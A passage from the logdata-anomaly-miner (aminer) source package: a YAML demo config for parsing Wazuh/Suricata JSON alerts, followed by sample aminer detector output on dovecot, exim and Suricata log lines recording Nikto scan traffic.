optional_key_AVAILABLE_PRETTY: optional_key_AVAILABLE_PRETTY optional_key__SOURCE_REALTIME_TIMESTAMP: optional_key__SOURCE_REALTIME_TIMESTAMP optional_key_JOB_TYPE: optional_key_JOB_TYPE optional_key_JOB_RESULT: optional_key_JOB_RESULT optional_key_UNIT: optional_key_UNIT optional_key_INVOCATION_ID: optional_key_INVOCATION_ID optional_key__STREAM_ID: optional_key__STREAM_ID optional_key__AUDIT_TYPE: optional_key__AUDIT_TYPE optional_key__AUDIT_ID: optional_key__AUDIT_ID optional_key__AUDIT_FIELD_APPARMOR: optional_key__AUDIT_FIELD_APPARMOR optional_key__AUDIT_FIELD_OPERATION: optional_key__AUDIT_FIELD_OPERATION optional_key__AUDIT_FIELD_PROFILE: optional_key__AUDIT_FIELD_PROFILE optional_key__AUDIT_FIELD_NAME: optional_key__AUDIT_FIELD_NAME optional_key_ADDRESS: optional_key_ADDRESS optional_key_PREFIXLEN: optional_key_PREFIXLEN optional_key_GATEWAY: optional_key_GATEWAY optional_key__AUDIT_SESSION: optional_key__AUDIT_SESSION optional_key__AUDIT_LOGINUID: optional_key__AUDIT_LOGINUID optional_key_SESSION_ID: optional_key_SESSION_ID optional_key_USER_ID: optional_key_USER_ID optional_key_LEADER: optional_key_LEADER optional_key_KERNEL_USEC: optional_key_KERNEL_USEC optional_key_USERSPACE_USEC: optional_key_USERSPACE_USEC optional_key__SYSTEMD_OWNER_UID: optional_key__SYSTEMD_OWNER_UID optional_key_USER_UNIT: optional_key_USER_UNIT optional_key_USER_INVOCATION_ID: optional_key_USER_INVOCATION_ID optional_key__SYSTEMD_USER_SLICE: optional_key__SYSTEMD_USER_SLICE optional_key__SYSTEMD_USER_UNIT: optional_key__SYSTEMD_USER_UNIT optional_key__SYSTEMD_SESSION: optional_key__SYSTEMD_SESSION Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json-wazuh-demo.yml000066400000000000000000000172241500476301700314370ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/wazuh.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: level type: DecimalIntegerValueModelElement name: 'level' - id: description type: FixedWordlistDataModelElement name: 'description' args: - 'IDS event.' - 'Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character' - id: id type: DecimalIntegerValueModelElement name: 'id' value_pad_type: 'zero' - id: firedtimes type: DecimalIntegerValueModelElement name: 'firedtimes' - id: bool_wordlist type: FixedWordlistDataModelElement name: 'bool' args: - 'true' - 'false' - id: groups type: FixedWordlistDataModelElement name: 'name' args: - 'ids' - 'suricata' - id: name type: FixedWordlistDataModelElement name: 'name' args: - 'user-0' - id: id_sec type: DateTimeModelElement name: 'id_sec' date_format: '%s.%f' - id: full_log type: AnyByteDataModelElement name: 'full_log' - id: predecoder_timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%d/%m/%Y-%H:%M:%S.%f' - id: _parent type: FixedWordlistDataModelElement name: '_parent' args: - 'snort' - id: decoder_name type: FixedWordlistDataModelElement name: 'name' args: - 'snort' - 'json' - id: _srcip type: IpAddressDataModelElement name: '_srcip' - id: dstip_ip type: IpAddressDataModelElement name: 'dstip_ip' - id: colon type: FixedDataModelElement name: 'colon' args: ':' - id: port type: DecimalIntegerValueModelElement name: 'port' - id: _dstip type: SequenceModelElement name: '_dstip' args: - dstip_ip - colon - port - id: data_id type: FixedWordlistDataModelElement name: 'data_id' args: - '1:2221030:1' - id: location type: FixedWordlistDataModelElement name: 'location' args: - '/var/log/forensic/suricata/fast.log' - '/var/log/forensic/suricata/eve.json' - id: _in_iface type: FixedWordlistDataModelElement name: '_in_iface' args: - 'eth0' - id: _event_type type: FixedWordlistDataModelElement name: '_event_type' args: - 'alert' - id: _src_ip type: IpAddressDataModelElement name: '_src_ip' - id: _src_port type: DecimalIntegerValueModelElement name: '_src_port' - id: _dest_ip type: IpAddressDataModelElement name: '_dest_ip' - id: _dest_port type: DecimalIntegerValueModelElement name: '_dest_port' - id: _proto type: FixedWordlistDataModelElement name: '_proto' args: - 'TCP' - id: _tx_id type: DecimalIntegerValueModelElement name: '_tx_id' - id: action type: FixedWordlistDataModelElement name: 'action' args: - 'allowed' - id: gid type: DecimalIntegerValueModelElement name: 'gid' - id: signature_id type: DecimalIntegerValueModelElement name: 'signature_id' - id: rev type: DecimalIntegerValueModelElement name: 'rev' - id: signature type: FixedWordlistDataModelElement name: 'signature' args: - 'SURICATA HTTP METHOD terminated by non-compliant character' - id: category type: FixedWordlistDataModelElement name: 'category' args: - 'Generic Protocol Command Decode' - id: severity type: DecimalIntegerValueModelElement name: 'severity' - id: hostname type: FixedWordlistDataModelElement name: 'hostname' args: - 'mail.cup.com' - id: url type: VariableByteDataModelElement name: 'url' args: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&=+$,/?%#\~ - id: http_user_agent type: FixedWordlistDataModelElement name: 'http_user_agent' args: - 'Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)' - id: http_content_type type: FixedWordlistDataModelElement name: 'http_content_type' args: - 'text/html' - id: http_method type: FixedWordlistDataModelElement name: 'http_method' args: - 'GET' - id: protocol type: FixedDataModelElement name: 'protocol' args: 'HTTP/1.1' - id: status type: DecimalIntegerValueModelElement name: 'status' - id: length type: DecimalIntegerValueModelElement name: 'length' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: timestamp: timestamp rule: level: level description: description id: id firedtimes: firedtimes mail: bool_wordlist groups: - groups agent: id: id name: name manager: name: name id: id_sec full_log: full_log _predecoder: timestamp: predecoder_timestamp decoder: _parent: _parent name: decoder_name data: _srcip: _srcip _dstip: _dstip _id: data_id _timestamp: timestamp _flow_id: id_sec _in_iface: _in_iface _event_type: _event_type _src_ip: _src_ip _src_port: _src_port _dest_ip: _dest_ip _dest_port: _dest_port _proto: _proto _tx_id: _tx_id _alert: action: action gid: gid signature_id: signature_id rev: rev signature: signature category: category severity: severity _http: hostname: hostname url: url http_user_agent: http_user_agent http_content_type: http_content_type http_method: http_method protocol: protocol status: status length: length location: location Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/000077500000000000000000000000001500476301700276545ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/aminer.log000066400000000000000000045524701500476301700316530ustar00rootroot00000000000000{ "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "Path Detector", "Message": "New path(s) detected", "PersistenceFileName": "Default", "AffectedLogAtomPaths": [ "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/auth/no_auth_str" ], "ParsedLogAtom": { "/parser/model": "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/time": 1583349453, "/parser/model/sp1": " ", "/parser/model/host": "mail", "/parser/model/service/dovecot": " dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/dovecot_str": " dovecot: ", "/parser/model/service/dovecot/imap/imap_login": "imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/imap_login_str": "imap-login: ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str": "Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/disconnected_str": "Disconnected ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/auth/no_auth_str": "(no auth attempts in ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/duration": 0, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/secs_str": " secs): ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info": "user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user_str": "user=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method_str": ">", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip_str": ", rip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip": 3232238318, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip_str": ", lip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip": 3232238234, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/mpid": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/secured": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session_str": ", session=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session": "B4nCRQygltnAqAru", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/bracket_str": ">" } }, "LogData": { "RawLogData": [ "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=" ], "Timestamps": [ 1583349453 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 12, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Syslog disconnected user info", "Message": "New value combination(s) detected", "PersistenceFileName": "syslog_disconnected_user", "AffectedLogAtomPaths": [ "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user/user", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method/method", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/secured" ], "AffectedLogAtomValues": [ null, null, 3232238318, 3232238234, null ], "ParsedLogAtom": { "/parser/model": "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/time": 1583349453, "/parser/model/sp1": " ", "/parser/model/host": "mail", "/parser/model/service/dovecot": " dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/dovecot_str": " dovecot: ", "/parser/model/service/dovecot/imap/imap_login": "imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/imap_login_str": "imap-login: ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str": "Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/disconnected_str": "Disconnected ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/auth/no_auth_str": "(no auth attempts in ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/duration": 0, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/secs_str": " secs): ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info": "user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user_str": "user=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method_str": ">", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip_str": ", rip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip": 3232238318, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip_str": ", lip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip": 3232238234, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/mpid": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/secured": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session_str": ", session=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session": "B4nCRQygltnAqAru", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/bracket_str": ">" } }, "LogData": { "RawLogData": [ "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=" ], "Timestamps": [ 1583349453 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "Path Detector", "Message": "New path(s) detected", "PersistenceFileName": "Default", "AffectedLogAtomPaths": [ "/parser/model/fm/no_host_found", "/parser/model/fm/no_host_found/no_host_found_str", "/parser/model/fm/no_host_found/ip" ], "ParsedLogAtom": { "/parser/model": "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238", "/parser/model/time": 1583349454, "/parser/model/sp": " ", "/parser/model/fm/no_host_found": "no host name found for IP address 192.168.10.238", "/parser/model/fm/no_host_found/no_host_found_str": "no host name found for IP address ", "/parser/model/fm/no_host_found/ip": 3232238318 } }, "LogData": { "RawLogData": [ "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238" ], "Timestamps": [ 1583349454 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 5, "AnalysisComponentType": "NewMatchPathValueDetector", "AnalysisComponentName": "Exim no host name found ip", "Message": "New value(s) detected", "PersistenceFileName": "exim_no_host_name_found_ip", "AffectedLogAtomPaths": [ "/parser/model/fm/no_host_found/ip" ], "AffectedLogAtomValues": [ 3232238318 ], "ParsedLogAtom": { "/parser/model": "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238", "/parser/model/time": 1583349454, "/parser/model/sp": " ", "/parser/model/fm/no_host_found": "no host name found for IP address 192.168.10.238", "/parser/model/fm/no_host_found/no_host_found_str": "no host name found for IP address ", "/parser/model/fm/no_host_found/ip": 3232238318 } }, "LogData": { "RawLogData": [ "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238" ], "Timestamps": [ 1583349454 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:33.887668 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46762 -> 192.168.10.154:80", "/parser/model/time": 1583349513.887668, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46762, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:33.887668 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46762 -> 192.168.10.154:80" ], "Timestamps": [ 1583349513.89 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.132320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46764 -> 192.168.10.154:80", "/parser/model/time": 1583349514.13232, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46764, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.132320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46764 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.132560+0000\",\"flow_id\":2024454293684286,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.13256, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2024454293684286,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46764, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2024454293684286,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2024454293684286, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.132560+0000\",\"flow_id\":2024454293684286,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.134229 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46766 -> 192.168.10.154:80", "/parser/model/time": 1583349514.134229, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46766, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.134229 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46766 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 